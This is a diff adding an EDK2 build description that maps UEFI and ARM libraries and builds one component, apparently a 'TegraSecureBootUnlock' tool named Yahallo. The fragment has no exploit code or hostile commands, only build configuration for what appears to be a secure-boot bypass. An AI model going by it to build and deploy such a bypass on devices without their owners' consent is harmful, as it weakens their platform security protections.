+  DEFINE DEBUG_ENABLE_OUTPUT      = FALSE       # Set to TRUE to enable debug output
+  DEFINE DEBUG_PRINT_ERROR_LEVEL  = 0x80000040  # Flags to control amount of debug output
+  DEFINE DEBUG_PROPERTY_MASK      = 0
+
+[PcdsFeatureFlag]
+
+[PcdsFixedAtBuild]
+  gEfiMdePkgTokenSpaceGuid.PcdDebugPropertyMask|$(DEBUG_PROPERTY_MASK)
+  gEfiMdePkgTokenSpaceGuid.PcdDebugPrintErrorLevel|$(DEBUG_PRINT_ERROR_LEVEL)
+
+[LibraryClasses]
+  #
+  # Entry Point Libraries
+  #
+  UefiApplicationEntryPoint|MdePkg/Library/UefiApplicationEntryPoint/UefiApplicationEntryPoint.inf
+  ShellCEntryLib|ShellPkg/Library/UefiShellCEntryLib/UefiShellCEntryLib.inf
+  UefiDriverEntryPoint|MdePkg/Library/UefiDriverEntryPoint/UefiDriverEntryPoint.inf
+  WindowsBootApplicationEntryPoint|YahalloPkg/Library/WindowsBootApplicationEntryPoint/WindowsBootApplicationEntryPoint.inf
+
+  #
+  # Common Libraries
+  #
+  BaseLib|MdePkg/Library/BaseLib/BaseLib.inf
+  # This needs to be faster
+  BaseMemoryLib|MdePkg/Library/BaseMemoryLibOptDxe/BaseMemoryLibOptDxe.inf
+  UefiLib|MdePkg/Library/UefiLib/UefiLib.inf
+  PrintLib|MdePkg/Library/BasePrintLib/BasePrintLib.inf
+  PcdLib|MdePkg/Library/BasePcdLibNull/BasePcdLibNull.inf
+  MemoryAllocationLib|MdePkg/Library/UefiMemoryAllocationLib/UefiMemoryAllocationLib.inf
+  UefiBootServicesTableLib|MdePkg/Library/UefiBootServicesTableLib/UefiBootServicesTableLib.inf
+  UefiRuntimeServicesTableLib|MdePkg/Library/UefiRuntimeServicesTableLib/UefiRuntimeServicesTableLib.inf
+  !if $(DEBUG_ENABLE_OUTPUT)
+    DebugLib|MdePkg/Library/UefiDebugLibConOut/UefiDebugLibConOut.inf
+    DebugPrintErrorLevelLib|MdePkg/Library/BaseDebugPrintErrorLevelLib/BaseDebugPrintErrorLevelLib.inf
+  !else   ## DEBUG_ENABLE_OUTPUT
+    DebugLib|MdePkg/Library/BaseDebugLibNull/BaseDebugLibNull.inf
+  !endif  ## DEBUG_ENABLE_OUTPUT
+
+  DevicePathLib|MdePkg/Library/UefiDevicePathLib/UefiDevicePathLib.inf
+  PeCoffGetEntryPointLib|MdePkg/Library/BasePeCoffGetEntryPointLib/BasePeCoffGetEntryPointLib.inf
+  IoLib|MdePkg/Library/BaseIoLibIntrinsic/BaseIoLibIntrinsic.inf
+  PciLib|MdePkg/Library/BasePciLibCf8/BasePciLibCf8.inf
+  PciCf8Lib|MdePkg/Library/BasePciCf8Lib/BasePciCf8Lib.inf
+  SynchronizationLib|MdePkg/Library/BaseSynchronizationLib/BaseSynchronizationLib.inf
+  UefiRuntimeLib|MdePkg/Library/UefiRuntimeLib/UefiRuntimeLib.inf
+  HiiLib|MdeModulePkg/Library/UefiHiiLib/UefiHiiLib.inf
+  UefiHiiServicesLib|MdeModulePkg/Library/UefiHiiServicesLib/UefiHiiServicesLib.inf
+  PerformanceLib|MdeModulePkg/Library/DxePerformanceLib/DxePerformanceLib.inf
+  HobLib|MdePkg/Library/DxeHobLib/DxeHobLib.inf
+  FileHandleLib|MdePkg/Library/UefiFileHandleLib/UefiFileHandleLib.inf
+  SortLib|MdeModulePkg/Library/UefiSortLib/UefiSortLib.inf
+  ShellLib|ShellPkg/Library/UefiShellLib/UefiShellLib.inf
+  CacheMaintenanceLib|MdePkg/Library/BaseCacheMaintenanceLib/BaseCacheMaintenanceLib.inf
+  NULL|MdePkg/Library/BaseStackCheckLib/BaseStackCheckLib.inf
+
+  #
+  # ARM specific Libraries
+  #
+  ArmLib|ArmPkg/Library/ArmLib/ArmBaseLib.inf
+  ArmSmcLib|ArmPkg/Library/ArmSmcLib/ArmSmcLib.inf
+  CompilerIntrinsicsLib|ArmPkg/Library/CompilerIntrinsicsLib/CompilerIntrinsicsLib.inf
+  NULL|ArmPkg/Library/CompilerIntrinsicsLib/CompilerIntrinsicsLib.inf
+
+[Components]
+  YahalloPkg/TegraSecureBootUnlock/Yahallo.inf
+